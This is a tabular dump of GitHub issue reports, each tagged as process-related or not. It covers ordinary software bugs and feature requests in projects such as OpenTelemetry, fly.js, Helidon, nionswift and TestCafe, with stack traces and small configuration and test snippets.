pod_association:
- sources:
- from: resource_attribute
name: k8s.namespace.name
- from: resource_attribute
name: k8s.pod.name
```
| process | prometheus translator multiple target metric might be emitted if gropubyattrs processor is involved describe the bug a clear and concise description of what the bug is given a metrics pipeline like prometheus receiver groupbyattrs processor prometheusremotewrite exporter since groupbyattrs sort of splits the pmetric metrics to multiple pmetric metrics and in prometheusremotewrite exporter the translator resource target info the target metric for every pmetric metrics which turns out eventually we got multiple target metric see additional context part for more details for our use case steps to reproduce give a simple metrics like help m type m gauge m a a n m a a n m a b n m a b n and a config yaml receivers prometheus config scrape configs job name kubernetes cadvisor metrics metrics path metrics txt static configs targets localhost exporters prometheusremotewrite endpoint processors batch groupbyattrs keys a service telemetry logs level debug metrics level detailed address pipelines metrics receivers processors exporters what did you expect to see just one target metric for a scrape target what did you see instead multiple target metrics what version did you use version what config did you use config e g the yaml config file environment os e g ubuntu compiler if manually compiled e g go additional context the reason we need groupbyattrs is that we are collecting cadvisor metrics and enrich them with additional pod info to do so we group metrics by namespace and pod name then follow by a processor as it only supports enrichment based on resources not metric attributes currently and probably more efficient as enrich multiple metrics multiple times seems to be more expensive than group multiple metrics by attributes yaml resource copy attributes key namespace name from attribute namespace action insert key pod name from attribute pod action insert pod association sources from resource attribute name namespace name from resource attribute name pod name | 1 
|
5,838 | 8,666,698,461 | IssuesEvent | 2018-11-29 05:36:46 | wendux/fly | https://api.github.com/repos/wendux/fly | closed | Latest version (0.6.4) errors at runtime on Linux (CentOS) | processing | Updated to the latest version: **0.6.4**
Everything runs fine on Mac OS (10.14) and Windows 10, but after deploying to Alibaba Cloud (**CentOS Linux release 7.5.1804**) the following error is reported:
```
RangeError: Maximum call stack size exceeded (uncaughtException throw 1 times on pid:30014)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:143:26)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
```
Any code reproduces it, for example:
``` javascript
let res = await fly.get(`{url}`);
```
The current workaround is to switch the **fly** library back to **request-promise**, after which everything works again. | 1.0 | Latest version (0.6.4) errors at runtime on Linux (CentOS) - Updated to the latest version: **0.6.4**
Everything runs fine on Mac OS (10.14) and Windows 10, but after deploying to Alibaba Cloud (**CentOS Linux release 7.5.1804**) the following error is reported:
```
RangeError: Maximum call stack size exceeded (uncaughtException throw 1 times on pid:30014)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:143:26)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
```
Any code reproduces it, for example:
``` javascript
let res = await fly.get(`{url}`);
```
目前临时解决方式,是把**fly**库再换回**request-promise**,一切又正常了。 | process | 最新版( )在linux(centos)上运行报错 更新到最新版: mac os( )和windows ,可是部署在阿里云( centos linux release )之后,报如下错误: rangeerror maximum call stack size exceeded uncaughtexception throw times on pid at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home 
xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js 任何代码皆可复现,比如: javascript let res await fly get url 目前临时解决方式,是把 fly 库再换回 request promise ,一切又正常了。 | 1 |
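The `RangeError` in the fly.js row above is the signature of an unbounded recursive clone: Node request/config objects can contain circular references, so a clone that never checks what it has already visited recurses until the stack overflows. A minimal sketch of the cycle-safe alternative, written in Python rather than JavaScript (fly's actual clone code is not reproduced here):

```python
def safe_clone(value, _seen=None):
    """Deep-clone dicts/lists while tolerating circular references.

    A cycle-unaware clone (like the one in the trace above) recurses
    forever on self-referencing objects; tracking visited objects by
    id() breaks the cycle.
    """
    if _seen is None:
        _seen = {}
    if id(value) in _seen:
        return _seen[id(value)]  # reuse the clone already in progress
    if isinstance(value, dict):
        clone = {}
        _seen[id(value)] = clone  # register before recursing
        for k, v in value.items():
            clone[k] = safe_clone(v, _seen)
        return clone
    if isinstance(value, list):
        clone = []
        _seen[id(value)] = clone
        for v in value:
            clone.append(safe_clone(v, _seen))
        return clone
    return value  # scalars are returned as-is
```

The key design point is registering the partially built clone in the memo *before* recursing into children, so a back-reference resolves to the in-progress copy instead of restarting the clone.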
13,820 | 16,582,978,484 | IssuesEvent | 2021-05-31 14:19:01 | laugharn/link | https://api.github.com/repos/laugharn/link | closed | Up-to-date User | kind/improvement process/selected size/sm team/back team/front | - [ ] Add a GET handler to /api/v1/user that will return an up to date version of the user
- [ ] Remove any use of the user cookie
- [ ] Cleanup
Down the line we'll probably refactor this to use localStorage | 1.0 | Up-to-date User - - [ ] Add a GET handler to /api/v1/user that will return an up to date version of the user
- [ ] Remove any use of the user cookie
- [ ] Cleanup
Down the line we'll probably refactor this to use localStorage | process | up to date user add a get handler to api user that will return an up to date version of the user remove any use of the user cookie cleanup down the line we ll probably refactor this to use localstorage | 1 |
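The first checklist item in the row above can be sketched as a handler that always reads the user from the backing store rather than from a cached cookie copy. The names (`USER_STORE`, `get_user`) are hypothetical; the issue does not specify the framework or storage layer:

```python
# Hypothetical in-memory store standing in for the real database.
USER_STORE = {}

def get_user(session):
    """Sketch of a GET /api/v1/user handler: return the up-to-date
    record from the store, never a stale copy from a user cookie."""
    user = USER_STORE.get(session.get("user_id"))
    if user is None:
        return {"status": 401, "body": None}
    # Return a copy so callers cannot mutate the stored record.
    return {"status": 200, "body": dict(user)}
```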
6,021 | 8,823,193,630 | IssuesEvent | 2019-01-02 12:38:40 | emacs-ess/ESS | https://api.github.com/repos/emacs-ess/ESS | closed | Activate goto-address-mode in inferior buffers? | process |
With interactive applications (shiny in particularly) it's getting more common to show the link in the buffer like
```
Listening on http://127.0.0.1:7087
```
Shall we activate `goto-address-mode`? It registers with jit lock so the performance penalty is close to 0. | 1.0 | Activate goto-address-mode in inferior buffers? -
With interactive applications (shiny in particularly) it's getting more common to show the link in the buffer like
```
Listening on http://127.0.0.1:7087
```
Shall we activate `goto-address-mode`? It registers with jit lock so the performance penalty is close to 0. | process | activate goto address mode in inferior buffers with interactive applications shiny in particularly it s getting more common to show the link in the buffer like listening on shall we activate goto address mode it registers with jit lock so the performance penalty is close to | 1 |
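At its core, `goto-address-mode` scans displayed text for URL-shaped substrings and makes them clickable, and because the matching is registered with jit-lock it only runs on visible text. A rough Python illustration of the detection step (the regex here is a simplification, not Emacs's actual `goto-address-url-regexp`):

```python
import re

# Simplified URL pattern; Emacs's real goto-address regexp is broader.
URL_RE = re.compile(r"https?://\S+")

def find_urls(buffer_text):
    """Return (start, end, url) spans that a goto-address-style mode
    would turn into clickable links."""
    return [(m.start(), m.end(), m.group()) for m in URL_RE.finditer(buffer_text)]
```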
919 | 3,378,314,489 | IssuesEvent | 2015-11-25 10:11:56 | Wikitalia/edgesense | https://api.github.com/repos/Wikitalia/edgesense | closed | Remove loops from graph visualization and edge count | enhancement front-end processing | It is not clear that loops have meaning in a social network of comments. Removing them improves the clarity of the graph. | 1.0 | Remove loops from graph visualization and edge count - It is not clear that loops have meaning in a social network of comments. Removing them improves the clarity of the graph. | process | remove loops from graph visualization and edge count it is not clear that loops have meaning in a social network of comments removing them improves the clarity of the graph | 1 |
15,759 | 2,869,057,449 | IssuesEvent | 2015-06-05 22:59:26 | dart-lang/sdk | https://api.github.com/repos/dart-lang/sdk | closed | mime: please add 'text/x-markdown' for markdown file extensions (md, markdown) to the _defaultExtensionMap | Area-Pkg Pkg-MIME Priority-Unassigned Triaged Type-Defect | *This issue was originally filed by ross.dart....@gmail.com*
_____
0.6.21_r26639
As markdown is quite common these days, and this change does not conflict with anything currently in the \_defaultExtensionMap, I think it is reasonable to add it?
'md':'text/x-markdown',
'markdown':'text/x-markdown',
The mime type 'text/x-markdown' seems to be what is most commonly used, for example:
node-mime: https://github.com/broofa/node-mime/pull/48/files
CodeMirror: http://codemirror.net/mode/markdown/
thanks! | 1.0 | mime: please add 'text/x-markdown' for markdown file extensions (md, markdown) to the _defaultExtensionMap - *This issue was originally filed by ross.dart....@gmail.com*
_____
0.6.21_r26639
As markdown is quite common these days, and this change does not conflict with anything currently in the \_defaultExtensionMap, I think it is reasonable to add it?
'md':'text/x-markdown',
'markdown':'text/x-markdown',
The mime type 'text/x-markdown' seems to be what is most commonly used, for example:
node-mime: https://github.com/broofa/node-mime/pull/48/files
CodeMirror: http://codemirror.net/mode/markdown/
thanks! | non_process | mime please add text x markdown for markdown file extensions md markdown to the defaultextensionmap this issue was originally filed by ross dart gmail com as markdown is quite common these days and this change does not conflict with anything currently in the defaultextensionmap i think it is reasonable to add it md text x markdown markdown text x markdown the mime type text x markdown seems to be what is most commonly used for example node mime codemirror thanks | 0 |
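The change requested in the row above amounts to two extra entries in an extension-to-MIME map. A Python sketch of the lookup behaviour being asked for (the map below mirrors, but is not, Dart's `_defaultExtensionMap`):

```python
# Small stand-in for the mime package's _defaultExtensionMap with the
# two proposed markdown entries added.
EXTENSION_MAP = {
    "html": "text/html",
    "txt": "text/plain",
    "md": "text/x-markdown",
    "markdown": "text/x-markdown",
}

def lookup_mime_type(filename, default="application/octet-stream"):
    """Resolve a MIME type from the file extension, case-insensitively."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return EXTENSION_MAP.get(ext, default)
```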
9,078 | 12,149,274,990 | IssuesEvent | 2020-04-24 15:53:12 | nion-software/nionswift | https://api.github.com/repos/nion-software/nionswift | closed | 1D data items (line plots) with negative scale show no data | f - line-plot f - processing level - easy type - bug | To reproduce the issue type the following into the builtin python console:
```python
import numpy as np
di=api.library.create_data_item_from_data(np.arange(100))
```
creates a data item with a line. Everything is fine so far. If you then do:
```python
c=api.create_calibration(scale=-1)
di.set_dimensional_calibrations([c])
```
After this command the data disappears from the data item. You can still do everything as normal, but you just do not see the plot. So the data seems to be there but is just not shown (also the labels at the axis are shown correctly). If you switch the display style to pixels or fractional the data appears. In calibrated mode it disappears again.
The issue occurs in Swift 0.12 and 0.13. It is not there in Swift 0.11 and earlier. | 1.0 | 1D data items (line plots) with negative scale show no data - To reproduce the issue type the following into the builtin python console:
```python
import numpy as np
di=api.library.create_data_item_from_data(np.arange(100))
```
creates a data item with a line. Everything is fine so far. If you then do:
```python
c=api.create_calibration(scale=-1)
di.set_dimensional_calibrations([c])
```
After this command the data disappears from the data item. You can still do everything as normal, but you just do not see the plot. So the data seems to be there but is just not shown (also the labels at the axis are shown correctly). If you switch the display style to pixels or fractional the data appears. In calibrated mode it disappears again.
The issue occurs in Swift 0.12 and 0.13. It is not there in Swift 0.11 and earlier. | process | data items line plots with negative scale show no data to reproduce the issue type the following into the builtin python console python import numpy as np di api library create data item from data np arange creates a data item with a line everything is fine so far if you then do python c api create calibration scale di set dimensional calibrations after this command the data disappears from the data item you can still do everything as normal but you just do not see the plot so the data seems to be there but is just not shown also the labels at the axis are shown correctly if you switch the display style to pixels or fractional the data appears in calibrated mode it disappears again the issue occurs in swift and it is not there in swift and earlier | 1 |
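A dimensional calibration maps index `i` to `offset + scale * i`, so `scale=-1` yields a strictly decreasing axis. A plausible mechanism for the symptom above (the real Swift rendering code is not shown here) is a renderer that assumes the calibrated left edge is smaller than the right edge, producing an empty x-range; sorting the endpoints fixes that, which is consistent with pixel/fractional modes working since they skip the calibration:

```python
def calibrated_range(length, offset=0.0, scale=1.0):
    """Calibrated coordinates of the first and last sample."""
    left = offset
    right = offset + scale * (length - 1)
    return left, right

def display_range(length, offset=0.0, scale=1.0):
    """Axis limits that stay valid for negative scales: sort the
    endpoints instead of assuming left < right."""
    left, right = calibrated_range(length, offset, scale)
    return min(left, right), max(left, right)
```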
226,320 | 18,011,700,282 | IssuesEvent | 2021-09-16 09:20:40 | oracle/helidon | https://api.github.com/repos/oracle/helidon | closed | helidon-tests-integration-mp-grpc fails with JDK 17 | P3 testing |
## Environment Details
* Helidon Version: 2.3.1-SNAPSHOT
* MP
* JDK version: java 17-ea 2021-09-14 LTS
* OS: Oracle Linux Server release 7.7
----------
## Problem Description
The test `tests/integration/mp-grpc` fails when built with JDK 17.
## Steps to reproduce
1. Set `JAVA_HOME` to JDK 11 and do priming build of helidon repo: `mvn clean install -DskipTests`
2. Set `JAVA_HOME` to JDK 17 and build test:
```
cd tests/integration/mp-grpc
mvn clean install
```
Lots of exceptions from the test. Here are some hilights:
```
[ERROR] io.helidon.microprofile.grpc.server.InterceptorsTest.shouldUseSpecificMethodInterceptorBean Time elapsed: 0.25 s <<< ERROR!
java.lang.reflect.InaccessibleObjectException: Unable to make protected final java.lang.Class java.lang.ClassLoader.defineClass(java.lang.String,byte[],int,int) throws java.lang.ClassFormatError accessible:
module java.base does not "opens java.lang" to unnamed module @164a08fd
at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:354)
at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:297)
at java.base/java.lang.reflect.Method.checkCanSetAccessible(Method.java:199)
at java.base/java.lang.reflect.Method.setAccessible(Method.java:193)
at org.jboss.weld.util.bytecode.ClassFileUtils$1.run(ClassFileUtils.java:67)
at java.base/java.security.AccessController.doPrivileged(AccessController.java:569)
at org.jboss.weld.util.bytecode.ClassFileUtils.makeClassLoaderMethodsAccessible(ClassFileUtils.java:60)
at org.jboss.weld.bootstrap.WeldStartup.startContainer(WeldStartup.java:220)
. . .
[ERROR] io.helidon.microprofile.grpc.server.InterceptorsTest.shouldDiscoverServiceInterceptor Time elapsed: 0.385 s <<< ERROR!
org.jboss.weld.exceptions.WeldException: WELD-001524: Unable to load proxy class for bean Implicit Bean
[javax.enterprise.inject.Instance] with qualifiers [@Default] with class interface javax.enterprise.inject.Instance
at org.jboss.weld.bean.proxy.ProxyFactory.getProxyClass(ProxyFactory.java:507)
. . .
Caused by: java.lang.RuntimeException: java.lang.IllegalAccessException: class org.jboss.weld.util.bytecode.ClassFileUtils
cannot access a member of class java.lang.ClassLoader (in module java.base) with modifiers "protected final"
at org.jboss.weld.util.bytecode.ClassFileUtils.toClass(ClassFileUtils.java:118)
at org.jboss.weld.bean.proxy.ProxyFactory.createProxyClass(ProxyFactory.java:610)
at org.jboss.weld.bean.proxy.ProxyFactory.getProxyClass(ProxyFactory.java:496)
... 62 more
Caused by: java.lang.IllegalAccessException: class org.jboss.weld.util.bytecode.ClassFileUtils
cannot access a member of class java.lang.ClassLoader (in module java.base) with modifiers "protected final"
at java.base/jdk.internal.reflect.Reflection.newIllegalAccessException(Reflection.java:392)
at java.base/java.lang.reflect.AccessibleObject.checkAccess(AccessibleObject.java:674)
at java.base/java.lang.reflect.Method.invoke(Method.java:560)
at org.jboss.weld.util.bytecode.ClassFileUtils.toClass2(ClassFileUtils.java:143)
at org.jboss.weld.util.bytecode.ClassFileUtils.toClass(ClassFileUtils.java:112)
... 64 more
``` | 1.0 | helidon-tests-integration-mp-grpc fails with JDK 17 -
## Environment Details
* Helidon Version: 2.3.1-SNAPSHOT
* MP
* JDK version: java 17-ea 2021-09-14 LTS
* OS: Oracle Linux Server release 7.7
----------
## Problem Description
The test `tests/integration/mp-grpc` fails when built with JDK 17.
## Steps to reproduce
1. Set `JAVA_HOME` to JDK 11 and do priming build of helidon repo: `mvn clean install -DskipTests`
2. Set `JAVA_HOME` to JDK 17 and build test:
```
cd tests/integration/mp-grpc
mvn clean install
```
Lots of exceptions from the test. Here are some highlights:
```
[ERROR] io.helidon.microprofile.grpc.server.InterceptorsTest.shouldUseSpecificMethodInterceptorBean Time elapsed: 0.25 s <<< ERROR!
java.lang.reflect.InaccessibleObjectException: Unable to make protected final java.lang.Class java.lang.ClassLoader.defineClass(java.lang.String,byte[],int,int) throws java.lang.ClassFormatError accessible:
module java.base does not "opens java.lang" to unnamed module @164a08fd
at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:354)
at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:297)
at java.base/java.lang.reflect.Method.checkCanSetAccessible(Method.java:199)
at java.base/java.lang.reflect.Method.setAccessible(Method.java:193)
at org.jboss.weld.util.bytecode.ClassFileUtils$1.run(ClassFileUtils.java:67)
at java.base/java.security.AccessController.doPrivileged(AccessController.java:569)
at org.jboss.weld.util.bytecode.ClassFileUtils.makeClassLoaderMethodsAccessible(ClassFileUtils.java:60)
at org.jboss.weld.bootstrap.WeldStartup.startContainer(WeldStartup.java:220)
. . .
[ERROR] io.helidon.microprofile.grpc.server.InterceptorsTest.shouldDiscoverServiceInterceptor Time elapsed: 0.385 s <<< ERROR!
org.jboss.weld.exceptions.WeldException: WELD-001524: Unable to load proxy class for bean Implicit Bean
[javax.enterprise.inject.Instance] with qualifiers [@Default] with class interface javax.enterprise.inject.Instance
at org.jboss.weld.bean.proxy.ProxyFactory.getProxyClass(ProxyFactory.java:507)
. . .
Caused by: java.lang.RuntimeException: java.lang.IllegalAccessException: class org.jboss.weld.util.bytecode.ClassFileUtils
cannot access a member of class java.lang.ClassLoader (in module java.base) with modifiers "protected final"
at org.jboss.weld.util.bytecode.ClassFileUtils.toClass(ClassFileUtils.java:118)
at org.jboss.weld.bean.proxy.ProxyFactory.createProxyClass(ProxyFactory.java:610)
at org.jboss.weld.bean.proxy.ProxyFactory.getProxyClass(ProxyFactory.java:496)
... 62 more
Caused by: java.lang.IllegalAccessException: class org.jboss.weld.util.bytecode.ClassFileUtils
cannot access a member of class java.lang.ClassLoader (in module java.base) with modifiers "protected final"
at java.base/jdk.internal.reflect.Reflection.newIllegalAccessException(Reflection.java:392)
at java.base/java.lang.reflect.AccessibleObject.checkAccess(AccessibleObject.java:674)
at java.base/java.lang.reflect.Method.invoke(Method.java:560)
at org.jboss.weld.util.bytecode.ClassFileUtils.toClass2(ClassFileUtils.java:143)
at org.jboss.weld.util.bytecode.ClassFileUtils.toClass(ClassFileUtils.java:112)
... 64 more
``` | non_process | helidon tests integration mp grpc fails with jdk environment details helidon version snapshot mp jdk version java ea lts os oracle linux server release problem description the test tests integration mp grpc fails when built with jdk steps to reproduce set java home to jdk and do priming build of helidon repo mvn clean install dskiptests set java home to jdk and build test cd tests integration mp grpc mvn clean install lots of exceptions from the test here are some hilights io helidon microprofile grpc server interceptorstest shouldusespecificmethodinterceptorbean time elapsed s error java lang reflect inaccessibleobjectexception unable to make protected final java lang class java lang classloader defineclass java lang string byte int int throws java lang classformaterror accessible module java base does not opens java lang to unnamed module at java base java lang reflect accessibleobject checkcansetaccessible accessibleobject java at java base java lang reflect accessibleobject checkcansetaccessible accessibleobject java at java base java lang reflect method checkcansetaccessible method java at java base java lang reflect method setaccessible method java at org jboss weld util bytecode classfileutils run classfileutils java at java base java security accesscontroller doprivileged accesscontroller java at org jboss weld util bytecode classfileutils makeclassloadermethodsaccessible classfileutils java at org jboss weld bootstrap weldstartup startcontainer weldstartup java io helidon microprofile grpc server interceptorstest shoulddiscoverserviceinterceptor time elapsed s error org jboss weld exceptions weldexception weld unable to load proxy class for bean implicit bean with qualifiers with class interface javax enterprise inject instance at org jboss weld bean proxy proxyfactory getproxyclass proxyfactory java caused by java lang runtimeexception java lang illegalaccessexception class org jboss weld util bytecode classfileutils cannot access a 
member of class java lang classloader in module java base with modifiers protected final at org jboss weld util bytecode classfileutils toclass classfileutils java at org jboss weld bean proxy proxyfactory createproxyclass proxyfactory java at org jboss weld bean proxy proxyfactory getproxyclass proxyfactory java more caused by java lang illegalaccessexception class org jboss weld util bytecode classfileutils cannot access a member of class java lang classloader in module java base with modifiers protected final at java base jdk internal reflect reflection newillegalaccessexception reflection java at java base java lang reflect accessibleobject checkaccess accessibleobject java at java base java lang reflect method invoke method java at org jboss weld util bytecode classfileutils classfileutils java at org jboss weld util bytecode classfileutils toclass classfileutils java more | 0 |
14,923 | 18,359,528,697 | IssuesEvent | 2021-10-09 01:45:40 | DevExpress/testcafe-hammerhead | https://api.github.com/repos/DevExpress/testcafe-hammerhead | closed | Relative navigation after pushState does not respect new URL | TYPE: bug AREA: client SYSTEM: URL processing FREQUENCY: level 1 STATE: Stale | ### What is your Test Scenario?
I saw some error pages that only happened in TestCafé but not when I execute the test manually. Turns out navigating with `location.href` works differently in TestCafé when you also do `history.pushState` on the page (as e.g. `react-router` does)
### What is the Current behavior?
* Load a website
* Use `history.pushState` with a URL on another level (e.g. use `/` somewhere in the 3rd argument)
* Use `location.href="relative"` to navigate
* The navigations happens relative to the initial URL and not relative to the updated URL
### What is the Expected behavior?
The navigation should happen relative to the URL currently displayed in the address bar, just like it does in the browser.
### What is your web application and your TestCafe test code?
Your website URL: I created a test that runs on some random GitHub pages, see test code below.
<details>
<summary>Your complete test code:</summary>
<!-- Paste your test code here: -->
```js
import {ClientFunction} from 'testcafe';
fixture`testcafe 2140`.page`https://github.com/bxt/testcafe-2140`;
const goAway = ClientFunction(() => {
window.location.href = 'pulls';
});
const virtualNavigation = ClientFunction(() => {
history.pushState({}, "page 2", "testcafe-2140/deeper");
});
const getPageUrl = ClientFunction(() => window.location.href);
test(`navigates to the correct URL on GitHub`, async t => {
await t.expect(getPageUrl()).eql('https://github.com/bxt/testcafe-2140');
await virtualNavigation();
await t.expect(getPageUrl()).eql('https://github.com/bxt/testcafe-2140/deeper');
await goAway();
await t.expect(getPageUrl()).eql('https://github.com/bxt/testcafe-2140/pulls');
});
```
</details>
<details>
<summary>Your complete test report:</summary>
<!-- Paste your complete result test report here (even if it is huge): -->
```
